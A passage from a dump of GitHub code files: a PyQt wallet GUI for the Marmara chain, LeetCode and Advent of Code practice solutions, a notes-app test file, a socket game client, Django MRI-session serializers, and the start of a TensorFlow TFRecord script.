self.worker_mcl_stats.out_err.connect(self.set_marmara_stats_err)\n self.stats_refresh_pushButton.setEnabled(False)\n QtCore.QTimer.singleShot(60000, self.stat_refresh_enable) # after 60 second it will enable button\n\n @pyqtSlot(dict)\n def set_marmara_stats_values(self, mcl_stats):\n mcl_stats_info = mcl_stats.get('info')\n self.stats_height_value_label.setText(str(mcl_stats_info.get('height')))\n self.stats_normal_label_value.setText(str(mcl_stats_info.get('TotalNormals')))\n self.stats_activated_label_value.setText(str(mcl_stats_info.get('TotalActivated')))\n self.stats_in_loops_label_value.setText(str(mcl_stats_info.get('TotalLockedInLoops')))\n self.bottom_info(self.tr('stats values retrieved'))\n self.stats_calculate_pushButton.setEnabled(True)\n self.stats_amount_in_activated_lineEdit.setEnabled(True)\n self.stats_amount_in_loops_lineEdit.setEnabled(True)\n total_supply = int(mcl_stats_info.get('TotalNormals')) + int(mcl_stats_info.get('TotalActivated')) + int(\n mcl_stats_info.get('TotalLockedInLoops'))\n total_normal_percentage = (int(mcl_stats_info.get('TotalNormals')) * 100) / total_supply\n total_activated_percentage = (int(mcl_stats_info.get('TotalActivated')) * 100) / total_supply\n total_inloops_percentage = (int(mcl_stats_info.get('TotalLockedInLoops')) * 100) / total_supply\n total_normal_per = round(total_normal_percentage, 2)\n total_activated_per = round(total_activated_percentage, 2)\n total_inloops_per = round(total_inloops_percentage, 2)\n self.stat_pie_chart(total_normal_per, total_activated_per, total_inloops_per)\n\n @pyqtSlot(str)\n def set_marmara_stats_err(self, err):\n if err == 'error':\n self.bottom_err_info(self.tr('Error in getting stats values'))\n\n def stat_pie_chart(self, normal, activated, inloops):\n if self.stats_layout.count() != 0:\n self.stats_layout.removeWidget(self.chartview)\n series = QPieSeries()\n series.append(\"Normal\", normal)\n series.append(\"Activated\", activated)\n series.append(\"In Loops\", inloops)\n\n series.setLabelsVisible(True)\n # color = [Qt.green, Qt.gray, Qt.magenta]\n series.setLabelsPosition(QtChart.QPieSlice.LabelOutside)\n for qslice in series.slices():\n qslice.setLabel(\"{:.2f}%\".format(100 * qslice.percentage()))\n # qslice.setBrush(color[series.slices().index(qslice)])\n\n chart = QChart()\n chart.legend().hide()\n chart.addSeries(series)\n chart.createDefaultAxes()\n chart.setAnimationOptions(QChart.SeriesAnimations)\n chart.legend().setVisible(True)\n chart.legend().setAlignment(Qt.AlignRight)\n chart.legend().markers(series)[0].setLabel(self.tr(\"Total Normal\"))\n chart.legend().markers(series)[1].setLabel(self.tr(\"Total Activated\"))\n chart.legend().markers(series)[2].setLabel(self.tr(\"Total In Loops\"))\n self.chartview = QChartView(chart)\n self.chartview.setRenderHint(QPainter.Antialiasing)\n self.stats_layout.addWidget(self.chartview)\n\n @pyqtSlot()\n def stat_refresh_enable(self):\n self.stats_refresh_pushButton.setEnabled(True)\n\n @pyqtSlot()\n def calculate_estimated_stake(self):\n total_activated = float(self.stats_activated_label_value.text())\n total_inloops = float(self.stats_in_loops_label_value.text())\n if self.stats_amount_in_activated_lineEdit.text():\n amount_activated = float(self.stats_amount_in_activated_lineEdit.text())\n else:\n amount_activated = 0\n self.stats_amount_in_activated_lineEdit.setText('0')\n if self.stats_amount_in_loops_lineEdit.text():\n amount_inloops = float(self.stats_amount_in_loops_lineEdit.text())\n else:\n amount_inloops = 0\n self.stats_amount_in_loops_lineEdit.setText('0')\n calculation = (((amount_activated / total_activated) + (amount_inloops / total_inloops) * 3) / 4) * 32400\n self.stats_estimated_staking_label_value.setText(str(calculation))\n # 30 * 60 * 24 * 0,75 = 32400\n\n @pyqtSlot()\n def get_wallet_earnings(self):\n if self.chain_status:\n start_datetime = self.earning_start_dateTimeEdit.dateTime()\n stop_datetime = self.earning_stop_dateTimeEdit.dateTime()\n latest_block = self.currentblock_value_label.text()\n beginheigth = int(latest_block) - int(self.change_datetime_to_block_age(start_datetime))\n endheigth = int(latest_block) - int(self.change_datetime_to_block_age(stop_datetime))\n if not beginheigth < endheigth <= int(latest_block):\n self.bottom_info(self.tr('Wrong Date Selection. start date should be less then stop date'))\n else:\n if (endheigth - beginheigth) <= 57600: # if more less 40 days\n self.worker_earnings = marmarachain_rpc.RpcHandler()\n method = cp.getblock\n params = [beginheigth, endheigth]\n self.worker_thread(self.thread_earnings, self.worker_earnings, method, params,\n worker_output=self.set_earnings_output, execute='wallet_earnings')\n else:\n self.bottom_info(self.tr('Difference between start and end dates cannot exceed 40 days'))\n else:\n self.bottom_info(self.tr('Marmarachain is not started'))\n logging.warning('Marmarachain is not started')\n\n @pyqtSlot(tuple)\n def set_earnings_output(self, output):\n if output[2] == 0:\n self.earning_stats_tableWidget.setRowCount(len(output[0]))\n normal_amount_sum = 0\n activated_amount_sum = 0\n row_index = 0\n for n_item, ac_item in zip(output[0], output[1]):\n normal_amount_sum = output[0].get(n_item) + normal_amount_sum\n activated_amount_sum = output[1].get(ac_item) + activated_amount_sum\n normal_amount = str(output[0].get(n_item))\n actve_amount = str(output[1].get(ac_item))\n total_amount = str(output[0].get(n_item) + output[1].get(ac_item))\n if configuration.ApplicationConfig().get_value('USER', 'lang') == 'TR':\n normal_amount = normal_amount.replace('.', ',')\n actve_amount = actve_amount.replace('.', ',')\n total_amount = total_amount.replace('.', ',')\n self.earning_stats_tableWidget.setItem(row_index, 0, QTableWidgetItem(str(n_item)))\n self.earning_stats_tableWidget.setItem(row_index, 1, QTableWidgetItem(normal_amount))\n self.earning_stats_tableWidget.setItem(row_index, 2, QTableWidgetItem(actve_amount))\n self.earning_stats_tableWidget.setItem(row_index, 3, QTableWidgetItem(total_amount))\n self.earning_stats_tableWidget.horizontalHeader().setSectionResizeMode(0, QHeaderView.ResizeToContents)\n self.earning_stats_tableWidget.horizontalHeader().setSectionResizeMode(1, QHeaderView.ResizeToContents)\n self.earning_stats_tableWidget.horizontalHeader().setSectionResizeMode(2, QHeaderView.ResizeToContents)\n self.earning_stats_tableWidget.horizontalHeader().setSectionResizeMode(3, QHeaderView.ResizeToContents)\n if row_index < len(output[0]) - 1:\n row_index = row_index + 1\n self.normal_earning_value.setText(str(normal_amount_sum))\n self.activated_earning_value.setText(str(activated_amount_sum))\n self.total_earning_value.setText(str(normal_amount_sum + activated_amount_sum))\n self.bottom_info(self.tr('finished getting earning stats'))\n if output[2] == 1:\n self.bottom_err_info(output[1])\n\n @pyqtSlot(str)\n def earnings_output_info(self, output):\n if output == 'normal txids':\n self.bottom_info(self.tr('Getting normal addresses transactions'))\n if output == 'activated txids':\n self.bottom_info(self.tr('Getting activated addresses transactions'))\n if output == 'calculating earnings':\n self.bottom_info(self.tr('Calculating earnings for normal and activated addresses'))\n\n @pyqtSlot()\n def pay_for_export(self):\n if self.earning_stats_tableWidget.rowCount() > 0:\n team_address = 'RXWqisAoJKEGVyXj46Zo3fDZnZTwQA6kQE'\n message_box = self.custom_message(self.tr('Support the team to export'),\n self.tr('You are about to send 5 MCL to Marmara Team'),\n \"question\",\n QMessageBox.Question)\n if message_box == QMessageBox.Yes:\n self.worker_sendtoaddress = marmarachain_rpc.RpcHandler()\n method = cp.sendtoaddress\n params = [team_address, 5]\n self.worker_thread(self.thread_sendtoaddress, self.worker_sendtoaddress, method, params,\n self.export_table_to_csv)\n\n if message_box == QMessageBox.No:\n self.bottom_info(self.tr('Transaction aborted'))\n logging.info('Transaction aborted')\n else:\n self.bottom_info(self.tr('Table has no data to export'))\n logging.info('Table has no data to export')\n\n @pyqtSlot(tuple)\n def export_table_to_csv(self, txid):\n if txid[0]:\n logging.info(txid[0])\n self.bottom_info('txid : ' + str(txid[0]).replace('\\n', ''))\n earnings_data = self.get_table_datas(self.earning_stats_tableWidget)\n self.export_as_csv_file(earnings_data)\n if txid[1]:\n self.bottom_err_info(txid[1])\n\n def export_as_csv_file(self, export_data):\n strt_date = str(self.earning_start_dateTimeEdit.dateTime().date().toString(QtCore.Qt.ISODate))\n stp_date = str(self.earning_stop_dateTimeEdit.dateTime().date().toString(QtCore.Qt.ISODate))\n if platform.system() == 'Linux':\n destination_path = str(pathlib.Path.home()) + '/Documents'\n csv_name = '/earning-stats_' + strt_date + '_' + stp_date + '.csv'\n if platform.system() == 'Win64' or platform.system() == 'Windows':\n destination_path = str(pathlib.Path.home()) + '\\Documents'\n csv_name = '\\earning-stats_' + strt_date + '_' + stp_date + '.csv'\n\n filename = QFileDialog.getExistingDirectory(self, 'Choose Location to save csv file', str(destination_path))\n configuration.export_as_scv(filename + csv_name, export_data)\n\n def get_table_datas(self, table):\n col_cnt = table.columnCount()\n table_data = []\n Header = []\n for col_no in range(col_cnt):\n Header.append(table.horizontalHeaderItem(col_no).text())\n table_data.append(Header)\n row_cnt = table.rowCount()\n if row_cnt > 0:\n for row_no in range(row_cnt):\n row_data = []\n for col_no in range(col_cnt):\n data = table.item(row_no, col_no).text()\n row_data.append(data)\n table_data.append(row_data)\n return table_data\n\n # -----------------\n # Market Page\n # -----------------\n\n def update_exchange_market_combobox(self):\n self.exchange_market_comboBox.clear()\n api_list = api_request.exchange_market_api_list\n for item in api_list:\n self.exchange_market_comboBox.addItem(str(item))\n\n @pyqtSlot()\n def get_mcl_exchange_market(self):\n self.exchange_market_request_button.setEnabled(False)\n QtCore.QTimer.singleShot(20000, self.enable_market_request) # after 20 second it will enable button\n index = self.exchange_market_comboBox.currentIndex()\n key = self.exchange_market_comboBox.itemText(index)\n self.mcl_exchange_worker = marmarachain_rpc.ApiWorker()\n self.mcl_exchange_worker.set_api_key(key)\n self.mcl_exchange_worker.moveToThread(self.thread_api_exchange_request)\n self.mcl_exchange_worker.finished.connect(self.thread_api_exchange_request.quit)\n self.thread_api_exchange_request.started.connect(self.mcl_exchange_worker.exchange_api_run)\n self.thread_api_exchange_request.start()\n self.mcl_exchange_worker.out_list.connect(self.set_mcl_exchange_market_result)\n # self.mcl_exchange_worker.out_err.connect(self.err_mcl_exchange_market_result)\n\n @pyqtSlot(list)\n def set_mcl_exchange_market_result(self, out_list):\n out_json = out_list[0]\n if type(out_json) is list:\n self.mcl_exchange_market_result = out_json\n self.update_exchange_table()\n if type(out_json) is str:\n if out_json == 'error':\n self.bottom_err_info(self.tr('Error in getting exchange values'))\n if out_list[1]:\n if type(out_list[1]) is dict:\n self.mcl_exchange_ticker_result = out_list[1]\n self.update_ticker_table()\n if type(out_list[1]) is str:\n if out_list[1] == 'error':\n self.bottom_err_info(self.tr('Error in getting exchange values'))\n\n def update_exchange_table(self):\n self.exchange_market_tableWidget.setRowCount(len(self.mcl_exchange_market_result))\n self.exchange_market_tableWidget.setSortingEnabled(False)\n fiat = self.market_fiat_comboBox.currentText()\n for row in self.mcl_exchange_market_result:\n price = ('%.8f' % row.get('quotes').get(fiat).get('price'))\n volume = ('%.8f' % row.get('quotes').get(fiat).get('volume_24h'))\n row_number = self.mcl_exchange_market_result.index(row)\n self.exchange_market_tableWidget.setItem(row_number, 0, QTableWidgetItem(str(row.get('exchange_name'))))\n self.exchange_market_tableWidget.setItem(row_number, 1, QTableWidgetItem(str(row.get('pair'))))\n self.exchange_market_tableWidget.setItem(row_number, 2, QTableWidgetItem(str(price)))\n self.exchange_market_tableWidget.setItem(row_number, 3, QTableWidgetItem(str(volume)))\n self.exchange_market_tableWidget.setItem(row_number, 4, QTableWidgetItem(\n str(row.get('last_updated')).replace('T', ' ').replace('Z', '')))\n self.exchange_market_tableWidget.horizontalHeader().setSectionResizeMode(0, QHeaderView.ResizeToContents)\n self.exchange_market_tableWidget.horizontalHeader().setSectionResizeMode(1, QHeaderView.ResizeToContents)\n self.exchange_market_tableWidget.horizontalHeader().setSectionResizeMode(2, QHeaderView.ResizeToContents)\n self.exchange_market_tableWidget.horizontalHeader().setSectionResizeMode(3, QHeaderView.ResizeToContents)\n self.exchange_market_tableWidget.horizontalHeader().setSectionResizeMode(4, QHeaderView.ResizeToContents)\n self.bottom_info(self.tr('fetched exchange values'))\n self.exchange_market_tableWidget.setSortingEnabled(True)\n\n def update_ticker_table(self):\n fiat = self.market_fiat_comboBox.currentText()\n price = ('%.8f' % self.mcl_exchange_ticker_result.get(fiat).get('price'))\n volume = ('%.8f' % self.mcl_exchange_ticker_result.get(fiat).get('volume_24h'))\n self.ticker_price_label_value.setText(str(price))\n self.ticker_volume_label_value.setText(str(volume))\n self.ticker_1hour_label_value.setText(\n str(self.mcl_exchange_ticker_result.get(fiat).get('percent_change_1h')))\n self.ticker_24hour_label_value.setText(\n str(self.mcl_exchange_ticker_result.get(fiat).get('percent_change_24h')))\n self.ticker_1week_label_value.setText(\n str(self.mcl_exchange_ticker_result.get(fiat).get('percent_change_7d')))\n self.ticker_1month_label_value.setText(\n str(self.mcl_exchange_ticker_result.get(fiat).get('percent_change_30d')))\n if self.ticker_price_label_value.text():\n self.mcl_amount_lineEdit.setEnabled(True)\n self.usd_amount_lineEdit.setEnabled(True)\n\n @pyqtSlot()\n def market_fiat_changed(self):\n self.convert_usd_label.setText(self.market_fiat_comboBox.currentText())\n self.calculate_usd_price()\n if self.mcl_exchange_market_result and self.mcl_exchange_ticker_result:\n self.update_exchange_table()\n self.update_ticker_table()\n\n @pyqtSlot()\n def calculate_usd_price(self):\n if self.mcl_amount_lineEdit.text():\n current_fiat = self.market_fiat_comboBox.currentText()\n price = float(self.mcl_exchange_ticker_result.get(current_fiat).get('price'))\n calculation = float(self.mcl_amount_lineEdit.text()) * price\n self.usd_amount_lineEdit.setText(str('%.8f' % calculation))\n\n @pyqtSlot()\n def calculate_mcl_price(self):\n if self.usd_amount_lineEdit.text():\n current_fiat = self.market_fiat_comboBox.currentText()\n price = float(self.mcl_exchange_ticker_result.get(current_fiat).get('price'))\n calculation = float(self.usd_amount_lineEdit.text()) / price\n self.mcl_amount_lineEdit.setText(str('%.8f' % calculation))\n\n @pyqtSlot()\n def enable_market_request(self):\n self.exchange_market_request_button.setEnabled(True)\n\n # -------------------------------------------------------------------\n # Remote Host adding , editing, deleting and saving in conf file\n # --------------------------------------------------------------------\n @pyqtSlot()\n def server_add_selected(self):\n self.login_stackedWidget.setCurrentIndex(2)\n\n @pyqtSlot()\n def add_cancel_selected(self):\n self.add_servername_lineEdit.setText(\"\")\n self.add_serverusername_lineEdit.setText(\"\")\n self.add_serverip_lineEdit.setText(\"\")\n self.remote_selection()\n\n @pyqtSlot()\n def server_edit_selected(self):\n self.login_stackedWidget.setCurrentIndex(3)\n server_list = configuration.ServerSettings().read_file()\n selected_server_info = server_list[self.server_comboBox.currentIndex()]\n selected_server_info = selected_server_info.split(\",\")\n self.edit_servername_lineEdit.setText(selected_server_info[0])\n self.edit_serverusername_lineEdit.setText(selected_server_info[1])\n self.edit_serverip_lineEdit.setText(selected_server_info[2])\n\n @pyqtSlot()\n def enable_ssh_custom_port(self):\n if self.ssh_port_checkBox.isChecked():\n self.ssh_port_lineEdit.setEnabled(True)\n else:\n self.ssh_port_lineEdit.setEnabled(False)\n self.ssh_port_lineEdit.setText('22')\n\n @pyqtSlot()\n def save_server_settings(self):\n if self.add_servername_lineEdit.text() != \"\" and self.add_serverusername_lineEdit.text() != \"\" and self.add_serverip_lineEdit.text() != \"\":\n configuration.ServerSettings().save_file(server_name=self.add_servername_lineEdit.text(),\n server_username=self.add_serverusername_lineEdit.text(),\n server_ip=self.add_serverip_lineEdit.text())\n self.add_servername_lineEdit.setText(\"\")\n self.add_serverusername_lineEdit.setText(\"\")\n self.add_serverip_lineEdit.setText(\"\")\n # self.get_server_combobox_names()\n # self.login_stackedWidget.setCurrentIndex(1)\n self.remote_selection()\n else:\n self.login_message_label.setText(self.tr('please insert all values'))\n\n def get_server_combobox_names(self):\n server_name_list = []\n server_settings_list = configuration.ServerSettings().read_file()\n self.server_comboBox.clear()\n for setting_list in server_settings_list:\n server_name_list.append(setting_list.split(\",\")[0])\n self.server_comboBox.addItems(server_name_list)\n\n @pyqtSlot()\n def edit_server_settings(self):\n if self.edit_servername_lineEdit.text() != \"\" and self.edit_serverusername_lineEdit.text() != \"\" and self.edit_serverip_lineEdit.text() != \"\":\n server_list = configuration.ServerSettings().read_file()\n del server_list[self.server_comboBox.currentIndex()]\n configuration.ServerSettings().delete_record(server_list)\n configuration.ServerSettings().save_file(server_name=self.edit_servername_lineEdit.text(),\n server_username=self.edit_serverusername_lineEdit.text(),\n server_ip=self.edit_serverip_lineEdit.text())\n self.login_stackedWidget.setCurrentIndex(1)\n self.edit_servername_lineEdit.setText(\"\")\n self.edit_serverusername_lineEdit.setText(\"\")\n self.edit_serverip_lineEdit.setText(\"\")\n self.get_server_combobox_names()\n self.login_stackedWidget.setCurrentIndex(1)\n else:\n self.login_message_label.setText(self.tr('please insert all values'))\n\n @pyqtSlot()\n def delete_server_setting(self):\n server_list = configuration.ServerSettings().read_file()\n del server_list[self.server_comboBox.currentIndex()]\n configuration.ServerSettings().delete_record(server_list)\n self.remote_selection()\n\n\nif __name__ == '__main__':\n appctxt = ApplicationContext()\n ui = MarmaraMain()\n ui.show()\n exit_code = appctxt.app.exec_()\n sys.exit(exit_code)\n","repo_name":"marmarachain/marmara-connector","sub_path":"src/main/python/mainApp.py","file_name":"mainApp.py","file_ext":"py","file_size_in_byte":177409,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"35"} +{"seq_id":"42995876728","text":"#Solution 1\n# class Solution:\n# def twoSum(self, nums: List[int], target: int) -> List[int]:\n# r = [2,7,11,15]\n\n# for i in range(len(nums)):\n# temp = target - nums[i]\n# if temp in r:\n# return [i,nums.index(temp)]\n\n# r.append(nums[i]) \n\n\n\n# Solution 2\nclass Solution:\n def twoSum(self, nums, target):\n ls = []\n for i in range(0, len(nums)):\n item = target - nums[i]\n nums[i] = \"done\"\n if item in nums:\n ls.append(i)\n ls.append(nums.index(item))\n return ls","repo_name":"btranscend/python-algorithms","sub_path":"twoSum.py","file_name":"twoSum.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"66691277","text":"from functools import reduce\nfrom typing import List\nfrom collections import Counter\nimport sys\n\n\ndef twoSum(nums: List[int], target: int) -> List[int]:\n sub_to_index = {target - v: i for i, v in enumerate(nums)}\n for num in nums:\n if num in sub_to_index and sub_to_index[num] != nums.index(num):\n return [nums.index(num), sub_to_index[num]]\n\n\nprint(twoSum([3, 2, 4], 6))\n\n\ndef decompressRLElist(nums: List[int]) -> List[int]:\n return reduce(lambda a, b: a + b, [[tpl[1]] * tpl[0] for tpl in [nums[i:i + 2] for i in range(0, len(nums), 2)]])\n\n\nprint(decompressRLElist([1, 2, 3, 4]))\n\n\ndef findNumbers2(nums: List[int]) -> int:\n result = 0\n for num in nums:\n if len(str(num)) % 2 == 0:\n result += 1\n\n return result\n\n\ndef findNumbers(nums: List[int]) -> int:\n result = 0\n for num in (num for num in nums if len(str(num)) % 2 == 0):\n result += 1\n\n return result\n\n\nprint(findNumbers([12, 345, 2, 6, 7896]))\n\n\ndef sumZero(n: int) -> List[int]:\n res = []\n if n % 2 != 0:\n res.append(0)\n for i in range(1, n // 2 + 1):\n res.append(i)\n res.append(-i)\n\n return res\n\n\nprint(sumZero(5))\n\n\ndef sortedSquares(A: List[int]) -> List[int]:\n return [x ** 2 for x in sorted(A, key=lambda x: abs(x))]\n\n\nprint(sortedSquares([-4, -1, 0, 3, 10]))\n\n\ndef countCharacters(words: List[str], chars: str) -> int:\n res = 0\n ref = Counter(chars)\n for word in words:\n if not Counter(word) - ref:\n res += len(word)\n\n return res\n\n\nprint(countCharacters([\"ccat\", \"bt\", \"hat\", \"tree\"], \"atach\"))\n\n\ndef fib(N: int) -> int:\n a = 0\n if N == 0:\n return a\n b = 1\n if N == 1:\n return b\n\n res = 1\n for i in range(2, N+1):\n tmp = a\n a = b\n b += tmp\n res += tmp\n\n return res\n\n\nprint(fib(4))\n\n\ndef minCostToMoveChips(chips: List[int]) -> int:\n odd = 0\n even = 0\n\n for chip in chips:\n if chip % 2 == 0:\n even += 1\n else:\n odd += 1\n\n if even > odd:\n parity = True\n else:\n parity = False\n\n res = 0\n for chip in chips:\n if chip % 2 == 0 ^ parity:\n res += 1\n\n return res\n\n\nprint(minCostToMoveChips([2, 2, 2, 3, 3]))\n\n\ndef maxProfitSingle(prices: List[int]) -> int:\n if not prices:\n return 0\n\n min = sys.maxsize\n result = -sys.maxsize - 1\n for price in prices:\n if price < min:\n min = price\n if result < price - min:\n result = price - min\n\n return result\n\n\nprint(maxProfitSingle([7, 1, 5, 3, 6, 4]))\nprint(maxProfitSingle([7, 6, 4, 3, 1]))\n\n\ndef maxProfit(prices: List[int]) -> int:\n res = 0\n for tpl in [prices[i:i+2] for i in range(0, len(prices)-1)]:\n if tpl[0] < tpl[1]:\n res += tpl[1]-tpl[0]\n\n return res\n\n\nprint(maxProfit([7, 1, 5, 3, 6, 4]))\nprint(maxProfit([1, 2, 3, 4, 5]))\n","repo_name":"benoitantelme/pythonstuff","sub_path":"leetcode/easy/ArrayExercises.py","file_name":"ArrayExercises.py","file_ext":"py","file_size_in_byte":2908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"41633222141","text":"g1_seed = 634\ng1_factor = 16807\ng2_seed = 301\ng2_factor = 48271\ng_mod = 2147483647\nmask = (2**16) - 1\n\nmatches = 0\ng1_last = g1_seed\ng2_last = g2_seed\nfor _ in range(0, 5_000_000):\n\n while True: # Next G1\n g1_last = (g1_last * g1_factor) % g_mod\n if g1_last & (4-1) == 0:\n break\n\n while True: # Next G2\n g2_last = (g2_last * g2_factor) % g_mod\n if g2_last & (8-1) == 0:\n break\n\n if g1_last & mask == g2_last & mask:\n matches += 1\n print(matches)\n\nprint('Final Count:', matches) # = 294\n","repo_name":"AdamKinnell/AdventOfCode2017","sub_path":"day15/day15_b.py","file_name":"day15_b.py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"39799373942","text":"from unittest.mock import Mock\n\nimport pytest # type: ignore\n\nfrom knb.use_cases import list_notes\nfrom knb.use_cases import specs\nfrom knb.utils import factory\n\n\n# noinspection Mypy\n\n\n@pytest.fixture\ndef gateway() -> list_notes.IGateway:\n mock = Mock()\n mock.load_notes.return_value = [factory.create_note() for i in range(150)]\n return mock\n\n\n# noinspection PyUnresolvedReferences\ndef test_list_notes(gateway):\n uc = list_notes.UseCase(gateway)\n\n response: list_notes.Output = uc(list_notes.Input(user_id=\"1\", page=1))\n spec = specs.AuthorSpec(\"1\").and_spec(specs.PageSpec(1, 100))\n gateway.load_notes.assert_called_with(spec)\n assert not response.errors\n assert response.notes\n\n\n# noinspection PyUnresolvedReferences\ndef test_list_other_page(gateway):\n uc = list_notes.UseCase(gateway)\n\n response: list_notes.Output = uc(list_notes.Input(user_id=\"1\", page=2))\n spec = specs.AuthorSpec(\"1\").and_spec(specs.PageSpec(2, 100))\n gateway.load_notes.assert_called_with(spec)\n assert not response.errors\n assert response.notes\n\n\ndef test_list_my_notes(gateway):\n uc = list_notes.UseCase(gateway)\n input = list_notes.Input(\"1\", 1)\n result: list_notes.Output = uc(input)\n author_spec = specs.AuthorSpec(\"1\")\n page_spec = specs.PageSpec(1, 100)\n spec = author_spec.and_spec(page_spec)\n # noinspection PyUnresolvedReferences\n gateway.load_notes.assert_called_with(spec)\n","repo_name":"KnowNBase/core","sub_path":"knb/use_cases/tests/test_list_notes.py","file_name":"test_list_notes.py","file_ext":"py","file_size_in_byte":1431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"39289191113","text":"import socket\n\n# IPADDR = \"192.168.100.87\"\n\nIPADDR = \"127.0.0.1\"\nPORT = 1234\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.connect((IPADDR, PORT))\n\ndef start_game(server, rounds):\n\n msg = \"\"\n\n while str(rounds) not in msg:\n choice = input(\"Your choice (Lizard, Rock, Paper, Scissors, Spock): \")\n server.send(bytearray(choice.encode(\"UTF-8\")))\n\n msg = server.recv(2048).decode(\"UTF-8\")\n print(msg)\n\n msg = server.recv(2048).decode(\"UTF-8\")\n print(msg)\n\n\nwhile True:\n\n msg = s.recv(2048).decode(\"UTF-8\")\n print(msg)\n\n if \"wait\" not in msg:\n\n option = 0\n while option != 1 and option != 2 and option != 3:\n try:\n option = int(input(\"Enter your option: \"))\n except:\n print(\"Invalid option! Option must be a number!\\n\")\n else:\n print(\"Invalid option!\")\n\n # if option == 3:\n # s.send(bytearray(str(option).encode(\"UTF-8\")))\n\n s.send(bytearray(str(option).encode(\"UTF-8\")))\n\n receivedMsg = s.recv(100).decode(\"UTF-8\")\n print(\"[server] \"+receivedMsg)\n\n if option == 1:\n start_game(s, 2)\n\n if option == 2:\n start_game(s, 3)\n\n if option == 3:\n msg = s.recv(2040).decode(\"UTF-8\")\n print(msg)\n break\n\n\n\ns.close()\n","repo_name":"StefanLungu/Rock-Paper-Scissors-Lizard-Spock","sub_path":"Client.py","file_name":"Client.py","file_ext":"py","file_size_in_byte":1368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"41731638567","text":"\"\"\"\nDefinition of the :class:`SessionReadSerializer` and `SessionWriteSerializer`\nclasses.\n\"\"\"\nfrom typing import Tuple\n\nfrom django.urls import reverse\nfrom rest_framework import serializers\n\nfrom django_mri.models.irb_approval import IrbApproval\nfrom django_mri.models.session import Session\nfrom django_mri.serializers.irb_approval import IrbApprovalSerializer\nfrom django_mri.serializers.utils import (MiniGroupSerializer,\n MiniMeasurementSerializer,\n MiniSubjectSerializer)\nfrom django_mri.utils import get_measurement_model, get_subject_model\n\nMeasurement = get_measurement_model()\nSubject = get_subject_model()\n\nSESSION_SERIALIZER_FIELDS: Tuple[str] = (\n \"id\",\n \"subject\",\n \"comments\",\n \"time\",\n \"measurement\",\n \"irb\",\n)\nSESSION_READ_FIELDS: Tuple[str] = (\n \"dicom_zip\",\n \"nifti_zip\",\n \"n_scans\",\n \"study_groups\",\n)\nSESSION_WRITE_FIELDS: Tuple[str] = (\n \"subject_id\",\n \"measurement_id\",\n \"irb_id\",\n)\n\n\nclass SessionSerializer(serializers.ModelSerializer):\n measurement = MiniMeasurementSerializer()\n subject = serializers.PrimaryKeyRelatedField(read_only=True)\n irb = IrbApprovalSerializer()\n\n class Meta:\n model = Session\n fields = SESSION_SERIALIZER_FIELDS\n\n\nclass SessionReadSerializer(SessionSerializer):\n \"\"\"\n Serializer class for the :class:`~django_mri.models.session.Session` model.\n \"\"\"\n\n dicom_zip = serializers.SerializerMethodField()\n nifti_zip = serializers.SerializerMethodField()\n n_scans = serializers.SerializerMethodField()\n study_groups = MiniGroupSerializer(many=True)\n\n class Meta:\n model = Session\n fields = tuple(\n list(SESSION_SERIALIZER_FIELDS) + list(SESSION_READ_FIELDS)\n )\n\n def get_dicom_zip(self, instance: Session) -> str:\n return reverse(\"mri:session_dicom_zip\", args=(instance.id,))\n\n def get_nifti_zip(self, instance: Session) -> str:\n return reverse(\"mri:session_nifti_zip\", args=(instance.id,))\n\n def get_n_scans(self, instance: Session) -> int:\n return instance.scan_set.count()\n\n\nclass AdminSessionReadSerializer(SessionReadSerializer):\n subject = MiniSubjectSerializer()\n\n\nclass SessionWriteSerializer(serializers.ModelSerializer):\n \"\"\"\n Serializer class for the :class:`~django_mri.models.session.Session` model.\n \"\"\"\n\n measurement_id = serializers.PrimaryKeyRelatedField(\n queryset=Measurement.objects.all(), allow_null=True\n )\n subject_id = serializers.PrimaryKeyRelatedField(\n queryset=Subject.objects.all()\n )\n irb_id = serializers.PrimaryKeyRelatedField(\n queryset=IrbApproval.objects.all(), allow_null=True\n )\n\n class Meta:\n model = Session\n fields = tuple(\n list(SESSION_SERIALIZER_FIELDS) + list(SESSION_WRITE_FIELDS)\n )\n\n def update(self, instance, validated_data):\n if validated_data.get(\"irb\"):\n irb = validated_data.pop(\"irb\")\n irb_approval, _ = IrbApproval.objects.get_or_create(\n institution=irb[\"institution\"], number=irb[\"number\"]\n )\n validated_data[\"irb_id\"] = irb_approval.id\n super().update(instance, validated_data)\n return instance\n","repo_name":"TheLabbingProject/django_mri","sub_path":"django_mri/serializers/session.py","file_name":"session.py","file_ext":"py","file_size_in_byte":3302,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"35"} +{"seq_id":"37755455335","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os,sys,inspect\ncurrentdir = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))\nparentdir = os.path.dirname(currentdir)\nsys.path.insert(0,parentdir)\n\nimport src.helpers as helpers\nimport src.loss as loss\nimport hyperparams\n\nimport argparse\nimport os\nimport sys\n\nimport tensorflow as tf\nimport numpy as np\n\nimport hyperparams\nimport src.data as d\nimport src.model as models\n\nimport tensorflow as tf\nimport src.model as models\nimport src.data as d\nimport src.metrics as metrics\nimport src.training as training\nimport src.loss as loss\nimport src.visual as vis\nimport hyperparams\nimport numpy as np\nimport src.helpers as helpers\nimport time\nimport util\n\nFLAGS = None\nnccnet = True\n\npathset = [ (120,9900, 11000), (20, 9900, 11000),\n (60, 16000, 17000),(70, 16000, 17000),\n (400, 8500, 27000),(400, 7000, 27000),\n (300, 7000, 21500),(151, 4500, 5000),\n (51, 18000, 9500), (52, 18000, 7500),\n (55, 18000, 7500), (60, 18100, 8400)]\n\n\ndef _int64_feature(value):\n return tf.train.Feature(int64_list=tf.train.Int64List(value=[value]))\n\n\ndef _bytes_feature(value):\n return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))\n\ndef convert_to(data, hparams, num_examples, name):\n 